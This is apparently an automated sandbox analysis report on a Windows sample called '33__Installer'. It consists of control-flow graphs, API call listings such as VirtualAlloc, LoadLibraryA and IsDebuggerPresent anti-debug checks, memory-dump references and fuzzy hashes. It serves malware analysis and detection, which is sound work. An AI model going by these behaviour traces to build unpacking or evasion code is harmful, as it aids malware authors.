                  control_flow_graph 544 c27e8d-c27eaa call c2af90 547 c27ec0-c27ecc 544->547 548 c27eac-c27eb7 call c2af3f call c2aeed 544->548 547->548 550 c27ece-c27ed7 547->550 555 c27ebc-c27ebe 548->555 550->548 552 c27ed9-c27ee3 call c31ac3 550->552 558 c27ef2-c27ef7 552->558 559 c27ee5-c27ef0 call c2af3f 552->559 557 c27f39-c27f3e call c2afd5 555->557 562 c27f19-c27f1f call c3182c 558->562 563 c27ef9-c27f17 call c2af3f call c31c00 558->563 559->555 568 c27f24-c27f36 call c27f3f 562->568 563->555 568->557
                  APIs
                  • __getstream.LIBCMT ref: 00C27ED9
                    • Part of subcall function 00C2AF3F: __getptd_noexit.LIBCMT ref: 00C2AF3F
                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 00C27F0F
                  • __openfile.LIBCMT ref: 00C27F1F
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: CallFilterFunc@8__getptd_noexit__getstream__openfile
                  • String ID:
                  • API String ID: 2808680356-0
                  • Opcode ID: a8fbdfe8f0ec7bd7212733d6342f75ecad7e942157b25c992dd0d965c7798d1a
                  • Instruction ID: db468cbad4fd9767eed44703ede09a0986cc4f4cecd2b0a88025f54ae19bc78b
                  • Opcode Fuzzy Hash: a8fbdfe8f0ec7bd7212733d6342f75ecad7e942157b25c992dd0d965c7798d1a
                  • Instruction Fuzzy Hash: D411ECB09192669FDB10BFF0ADC256E7BA5AF01310F174A78F420D7981D7384D4167A2

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 574 c23100-c23127 575 c2331a-c23329 574->575 576 c2312d-c23135 574->576 577 c23137-c23140 576->577 578 c23165-c23168 576->578 577->578 581 c23142-c23162 577->581 579 c23316-c23319 578->579 580 c2316e-c23176 578->580 579->575 582 c23178-c2318a 580->582 583 c2318c-c2318f 580->583 582->583 584 c23191-c23199 call c257d5 583->584 585 c231bf-c231df 583->585 589 c2319e-c231a4 584->589 587 c231e1 585->587 588 c231e4-c231e7 585->588 587->588 590 c231ea-c231ed 588->590 589->579 591 c231aa-c231bc 589->591 592 c231f0-c231f5 590->592 593 c231f7-c231fa 592->593 594 c231fc-c23221 592->594 593->594 596 c23227-c2322a 594->596 597 c2330e 594->597 598 c23297-c2329a 596->598 599 c2322c-c23237 596->599 600 c23311 call c22410 597->600 598->597 602 c2329c-c232ae call c22490 598->602 603 c23239 599->603 604 c2323c-c23241 599->604 600->579 613 c232d0-c232ed call c22410 602->613 614 c232b0-c232cd call c22410 602->614 603->604 606 c23243-c23246 604->606 607 c23269-c23273 604->607 609 c2324b-c2325d call c2607a 606->609 610 c23248 606->610 611 c232f0-c2330b call c22410 607->611 612 c23275-c23277 607->612 609->597 625 c23263-c23266 609->625 610->609 612->592 617 c2327d-c23284 612->617 617->600 622 c2328a-c23292 call c22a20 617->622 622->590 625->607
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: _fputc
                  • String ID:
                  • API String ID: 4236582747-3916222277
                  • Opcode ID: 0e5412a2e3e3088364d0e28a1ca6be10cd38730b90c06e52dc3d9279c6ae53b2
                  • Instruction ID: 0d2c8c3824f155bcf21a626354abc0c1f8def39824ef94847bb1c08251d3c5f2
                  • Opcode Fuzzy Hash: 0e5412a2e3e3088364d0e28a1ca6be10cd38730b90c06e52dc3d9279c6ae53b2
                  • Instruction Fuzzy Hash: 97719572A01658DFCB24CF98E9809AEF7F5FB98710F10466EE91593B40DB35AE05CB50

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 628 3cafb37-3cafb76 call 3cb1628 * 2 633 3cafb7c-3cafb7e 628->633 634 3cafd91 628->634 633->634 635 3cafb84-3cafb95 VirtualAlloc 633->635 636 3cafd94-3cafd9b 634->636 635->634 637 3cafb9b-3cafbe9 call 3cb18bb call 3cb18df call 3cb17ba call 3cb1695 635->637 646 3cafd3e-3cafd4a 637->646 647 3cafbef-3cafbf5 637->647 648 3cafd7a-3cafd8f call 3cb18df 646->648 649 3cafd4c-3cafd54 646->649 647->646 650 3cafbfb-3cafc15 call 3cb1628 647->650 648->636 649->648 651 3cafd56-3cafd73 call 3cb18df 649->651 650->634 658 3cafc1b-3cafc23 650->658 651->648 660 3cafc3b-3cafc41 658->660 661 3cafc25 658->661 663 3cafc43-3cafc46 660->663 664 3cafc77-3cafc82 660->664 662 3cafc2b-3cafc39 LoadLibraryA 661->662 662->660 662->662 666 3cafc49-3cafc62 call 3cb1628 663->666 667 3cafc99-3cafca2 664->667 668 3cafc84-3cafc8d call 3cb01b3 664->668 678 3cafd3a 666->678 679 3cafc68-3cafc75 666->679 671 3cafca6-3cafcad 667->671 672 3cafca4 667->672 668->678 682 3cafc93 668->682 675 3cafcaf-3cafcb8 call 3caffe7 671->675 676 3cafcd5-3cafcd8 671->676 672->671 686 3cafcba-3cafcc0 675->686 687 3cafcc2-3cafcc3 call 3cb00cd 675->687 680 3cafcda-3cafcdd 676->680 681 3cafd33-3cafd34 call 3cb0eca 676->681 678->646 679->664 679->666 680->681 684 3cafcdf-3cafce2 680->684 690 3cafd39 681->690 682->667 688 3cafd07-3cafd16 call 3cb09f9 684->688 689 3cafce4-3cafce6 684->689 686->678 686->687 694 3cafcc8-3cafccb 687->694 700 3cafd18-3cafd1e call 3cb0c04 688->700 701 3cafd25-3cafd31 call 3cb058d 688->701 689->688 693 3cafce8-3cafceb 689->693 690->678 696 3cafcff-3cafd05 call 3cb1351 693->696 697 3cafced-3cafcf0 693->697 694->676 699 3cafccd-3cafcd3 694->699 696->690 697->696 702 3cafcf2-3cafcf5 697->702 699->676 699->678 707 3cafd23-3cafd24 700->707 701->690 702->678 706 3cafcf7-3cafcfd call 3cb14e2 702->706 706->690 707->701
                  APIs
                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 03CAFB8F
                  • LoadLibraryA.KERNEL32(00000238), ref: 03CAFC2C
                  Memory Dump Source
                  • Source File: 00000000.00000002.4105617953.0000000003CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CA0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3ca0000_33__Installer.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocLibraryLoadVirtual
                  • String ID:
                  • API String ID: 3550616410-0
                  • Opcode ID: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
                  • Instruction ID: 45d6d885268b4062ab64a58f1334ba44da430f0f83925a7a972256ec1c12784b
                  • Opcode Fuzzy Hash: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
                  • Instruction Fuzzy Hash: 6761C172900F03ABCB32EFA98C90AABB7A9FF05218F19091DE65ACD450D735F251DB51

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 906 c26312-c2632e call c2af90 909 c26330-c26343 call c2af3f call c2aeed 906->909 910 c26345-c26349 906->910 917 c26352-c26357 call c2afd5 909->917 912 c2634b 910->912 913 c26358-c26364 call c25af4 call c262a5 910->913 916 c2634f 912->916 924 c26369-c26379 call c2637e 913->924 916->917 924->916
                  APIs
                    • Part of subcall function 00C2AF3F: __getptd_noexit.LIBCMT ref: 00C2AF3F
                  • __lock_file.LIBCMT ref: 00C26359
                    • Part of subcall function 00C25AF4: __lock.LIBCMT ref: 00C25B19
                  • __fclose_nolock.LIBCMT ref: 00C26364
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                  • String ID:
                  • API String ID: 2800547568-0
                  • Opcode ID: 09dd413d31e5cd39d2309f93bbc8570ff58b9d4b8ee973cfcf9e3a746a8a55db
                  • Instruction ID: a87eb2a828c5bbb0b852340755dc1d0efeb17087e3b4ff02279a2896fe332677
                  • Opcode Fuzzy Hash: 09dd413d31e5cd39d2309f93bbc8570ff58b9d4b8ee973cfcf9e3a746a8a55db
                  • Instruction Fuzzy Hash: A4F0B471811735DBD711EBB4B90276E7BA06F01330F258308E435AA8E1CBBC8A01BB66
                  APIs
                  • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,06177912), ref: 061779FF
                  Memory Dump Source
                  • Source File: 00000000.00000002.4106961310.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6170000_33__Installer.jbxd
                  Similarity
                  • API ID: GlobalMemoryStatus
                  • String ID:
                  • API String ID: 1890195054-0
                  • Opcode ID: 4f32ff60d06357a020e37d94a13bbefff669746775f4f34c6278c0195bb69f53
                  • Instruction ID: b69f0ba9e11abef75c6a4ee3cb8322d89027e029b7e03474fda446168f08fa27
                  • Opcode Fuzzy Hash: 4f32ff60d06357a020e37d94a13bbefff669746775f4f34c6278c0195bb69f53
                  • Instruction Fuzzy Hash: 3821A971C0425A9FCB10CFA9D4046DEFBF4EF48320F1485AAE484A7251E778A985CBE2
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: _memmove
                  • String ID:
                  • API String ID: 4104443479-0
                  • Opcode ID: a3ce1146190e77c9119a65bafe23c30523c48e3f6fe34d7c37c9e22ad0b6961b
                  • Instruction ID: 453ccc3c6112e0a949969dda3073330da82530490b5fe3d3ba41b6dc40807807
                  • Opcode Fuzzy Hash: a3ce1146190e77c9119a65bafe23c30523c48e3f6fe34d7c37c9e22ad0b6961b
                  • Instruction Fuzzy Hash: 07214B75901368EFCB40CF69E88069D77B5EF58320F1981AAEC28CB642D774CE40AB90
                  APIs
                  • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,06177912), ref: 061779FF
                  Memory Dump Source
                  • Source File: 00000000.00000002.4106961310.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6170000_33__Installer.jbxd
                  Similarity
                  • API ID: GlobalMemoryStatus
                  • String ID:
                  • API String ID: 1890195054-0
                  • Opcode ID: 1b107fe27f6d534e643b10de3692d0a90cc86d2f1e5d1438dff0b2d1013b402c
                  • Instruction ID: 5251b2053c2caea38760b6ab83a57d8011785f04aa4785aa655ebaafe8e15b18
                  • Opcode Fuzzy Hash: 1b107fe27f6d534e643b10de3692d0a90cc86d2f1e5d1438dff0b2d1013b402c
                  • Instruction Fuzzy Hash: 2B1144B1C002599BDB10CF9AC544BDEFBF4EB48324F14852AE818B7250D378A940CFE5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.4107305722.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6770000_33__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID: LR^q
                  • API String ID: 0-2625958711
                  • Opcode ID: 1388fdd18401a52bcf629943f74e2bfabf39c8d66cd78b360f898eb23020006e
                  • Instruction ID: 844109605bf046611bb33c6b85e7cfa0cd466222d97d6f6f13c196a4437f832d
                  • Opcode Fuzzy Hash: 1388fdd18401a52bcf629943f74e2bfabf39c8d66cd78b360f898eb23020006e
                  • Instruction Fuzzy Hash: 3501A275F102056FDF94EAA488127BEBAE9EB84600F108069E509DB280FB709A0287D2
                  Memory Dump Source
                  • Source File: 00000000.00000002.4107305722.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6770000_33__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 664a726ee2051fd309d4998df4539402ec678c06bf3ec1047b264673617b8a80
                  • Instruction ID: 2b1badd397414ad4db56119f8100f0dfef1c2fbf59b785d4aa401a576960553a
                  • Opcode Fuzzy Hash: 664a726ee2051fd309d4998df4539402ec678c06bf3ec1047b264673617b8a80
                  • Instruction Fuzzy Hash: 952128305043D09FC702AB7898143AE7FB9AF46310F14419AE495DB3E6DE6A4D56C7F2
                  Memory Dump Source
                  • Source File: 00000000.00000002.4105718206.0000000003CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CFD000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3cfd000_33__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6ba44fd540acf24cd1c8168648747a45c246f1812f2dcc0845bbda840f31d315
                  • Instruction ID: 6a2bd5826a487ee0810041abda7b24603178325dbafb5f656498d634e92221d2
                  • Opcode Fuzzy Hash: 6ba44fd540acf24cd1c8168648747a45c246f1812f2dcc0845bbda840f31d315
                  • Instruction Fuzzy Hash: 9421F871504200DFDB45DF14DAC8B1ABF65FB94314F2485A9DA0ACF25AC336E856C6A2
                  Memory Dump Source
                  • Source File: 00000000.00000002.4105718206.0000000003CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CFD000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3cfd000_33__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 20a79bdc70fafdd4f01ac923dbc2bce50329bcf4eebf8cc04ff9bca8ffa494ba
                  • Instruction ID: f90566e316ee3e1eed6a2bcce7b1b690000d261edecfebe626ea7a4d4b6ed12b
                  • Opcode Fuzzy Hash: 20a79bdc70fafdd4f01ac923dbc2bce50329bcf4eebf8cc04ff9bca8ffa494ba
                  • Instruction Fuzzy Hash: 4011B176504240CFDB16CF10D5C8B16BF71FB94324F28C5A9DA0A8F61AC336D55ACBA2
                  Memory Dump Source
                  • Source File: 00000000.00000002.4107305722.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6770000_33__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a9cbc7425294250244541c2ca66c77e07799294e3208145c3ddf44ebbb84eee4
                  • Instruction ID: 93748b058bb70b712b6b54d65a1218f912664160ddaad11ede72c4f8e18dde21
                  • Opcode Fuzzy Hash: a9cbc7425294250244541c2ca66c77e07799294e3208145c3ddf44ebbb84eee4
                  • Instruction Fuzzy Hash: 0001D670A10354DFDB45AB78990836E3EFAEB84300F204669A519973D8DF7689868BE1
                  Memory Dump Source
                  • Source File: 00000000.00000002.4105718206.0000000003CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CFD000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3cfd000_33__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dc8c7e4a8dddc474159870b05c73ee0553ba6bd49b32e9bea7752cef7cc0cea9
                  • Instruction ID: ca3b0ccc7d3210e42443be067004bb2250cc12820992377098b48a72fee5d927
                  • Opcode Fuzzy Hash: dc8c7e4a8dddc474159870b05c73ee0553ba6bd49b32e9bea7752cef7cc0cea9
                  • Instruction Fuzzy Hash: 8901DB6240D3C09FD7128B258898B52BFB4EF53224F1D85DBD9898F1A7C2699849C762
                  Memory Dump Source
                  • Source File: 00000000.00000002.4105718206.0000000003CFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CFD000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3cfd000_33__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7b1746d3c607a25c05b3b245a87ae7618dff468cb82b1b54d130f3822c05fd80
                  • Instruction ID: 8590a79cc9dff99cfbe7ddfae9eb8f5aee638bd6124cd3b11624f675de9e29ae
                  • Opcode Fuzzy Hash: 7b1746d3c607a25c05b3b245a87ae7618dff468cb82b1b54d130f3822c05fd80
                  • Instruction Fuzzy Hash: 5801A7714083409FE750CE26C988767FF98EF41324F1CC56AEE4ACF14AC6799985C6B1
                  Memory Dump Source
                  • Source File: 00000000.00000002.4107305722.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6770000_33__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 562bafa64bbe91a0356cba348b558f4e3e91f2bb7b1120ca17eb15547e8dea9e
                  • Instruction ID: a24edb92342c946199a6df891acd7dcc3d56d9f634efa60abdec6057c35e954c
                  • Opcode Fuzzy Hash: 562bafa64bbe91a0356cba348b558f4e3e91f2bb7b1120ca17eb15547e8dea9e
                  • Instruction Fuzzy Hash: 3C111EB6900348CFCB60DF9AD988BDEBBF0EB48324F208419D559A7210C334A984CFA5
                  Memory Dump Source
                  • Source File: 00000000.00000002.4107305722.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6770000_33__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8f05f24bbee6defa3f3108b0f846c1379392122c49ee4b7e50b319cdbc969082
                  • Instruction ID: 49dc9c8f6c6778fc67801fb208875e07645e7cd1e1968aa54f841221f7111042
                  • Opcode Fuzzy Hash: 8f05f24bbee6defa3f3108b0f846c1379392122c49ee4b7e50b319cdbc969082
                  • Instruction Fuzzy Hash: D511F0B6900359CFCB60DF9AC988BDEBBF4EB48324F208459D559A7250C374A984CFA5
                  APIs
                  • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,00C300EA,?,00C2750F,?,000000BC,?,00000001,00000000,00000000), ref: 00C2FAEC
                  • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,00C300EA,?,00C2750F,?,000000BC,?,00000001,00000000,00000000), ref: 00C2FB15
                  • GetACP.KERNEL32(?,?,00C300EA,?,00C2750F,?,000000BC,?,00000001,00000000), ref: 00C2FB29
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: InfoLocale
                  • String ID: ACP$OCP
                  • API String ID: 2299586839-711371036
                  • Opcode ID: 06af77320e8af1568ebf40e4d3f4828ecc712e45688f35c92b7d114475290832
                  • Instruction ID: 6f7367e56246f119eca1abb987faa110ca19571a5f4021f55d5809e68c150be6
                  • Opcode Fuzzy Hash: 06af77320e8af1568ebf40e4d3f4828ecc712e45688f35c92b7d114475290832
                  • Instruction Fuzzy Hash: D901713160222FBBEB159B65FC16B9EB6B8AF01758F20403CF101E5990DBA0DF42E694
                  APIs
                  • IsDebuggerPresent.KERNEL32 ref: 00C2E5E3
                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C2E5F8
                  • UnhandledExceptionFilter.KERNEL32(00C3AE50), ref: 00C2E603
                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00C2E61F
                  • TerminateProcess.KERNEL32(00000000), ref: 00C2E626
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                  • String ID:
                  • API String ID: 2579439406-0
                  • Opcode ID: 1bb00d7d53e451fa99890c2de61b471ff5ed67d7335a6ad65b35d17604762876
                  • Instruction ID: 44d1550089c69567406f219357a037032060f74c9e388ae9f85d57ea42822fd0
                  • Opcode Fuzzy Hash: 1bb00d7d53e451fa99890c2de61b471ff5ed67d7335a6ad65b35d17604762876
                  • Instruction Fuzzy Hash: A921CEB84A63049FD7A5DF15F98974C3BB4FB0A300F204019EA09972B0E7F09980CF15
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.4106961310.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6170000_33__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID: Xbq$$^q
                  • API String ID: 0-1593437937
                  • Opcode ID: f74d5da3047f094a2781520d04640a1d4401f913a32822705195165173c65184
                  • Instruction ID: 4b0e7e01351105dd1fc77c20d709961f485a5ac94f6e8a20e57deb771c74c4c1
                  • Opcode Fuzzy Hash: f74d5da3047f094a2781520d04640a1d4401f913a32822705195165173c65184
                  • Instruction Fuzzy Hash: 71817074B002189FDB58AF79846867E7BB6BBC8711B158929E407E7398CF358C028B91
                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(Function_0000CD2B), ref: 00C2CD72
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled
                  • String ID:
                  • API String ID: 3192549508-0
                  • Opcode ID: b61009ad2af8e6efc68facfa9387f95a159660e7952d5e5ba3e0770da241e4ae
                  • Instruction ID: 3ef250e239037bb193619435f831bc37de8133c206e8e63da5deff1208c29488
                  • Opcode Fuzzy Hash: b61009ad2af8e6efc68facfa9387f95a159660e7952d5e5ba3e0770da241e4ae
                  • Instruction Fuzzy Hash: C39002B066111456470427706D8970D39919A5D602B420470A102C5455DAE081005653
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                  • Instruction ID: 2dd967434050f3d90c5895a5857393564ed0b178a6a91692edef521e4ab374a9
                  • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                  • Instruction Fuzzy Hash: 44C19173D2A5F2498B75462E042823FEEA26EC1B4572FC391DCE43F58DC6236E1196D0
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                  • Instruction ID: 993d5a76e18a69d4821aa1c430095aad9342c03e8c0b74d16804e877f404d2ed
                  • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                  • Instruction Fuzzy Hash: D9C1A173D2A5F2498B35422E042823FEEA26E91B4572FC391DCE43F58DC623AE51D6D0
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                  • Instruction ID: c05f8cde1e78a3a29c978b19d6588b2dc975c894d6edc421191b272d25aa0dc3
                  • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                  • Instruction Fuzzy Hash: 42C19073D2A5F24A8B76462E142823FEEA16E81B4573FC391DCE43F58DC2236E1596D0
                  Memory Dump Source
                  • Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                  • Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
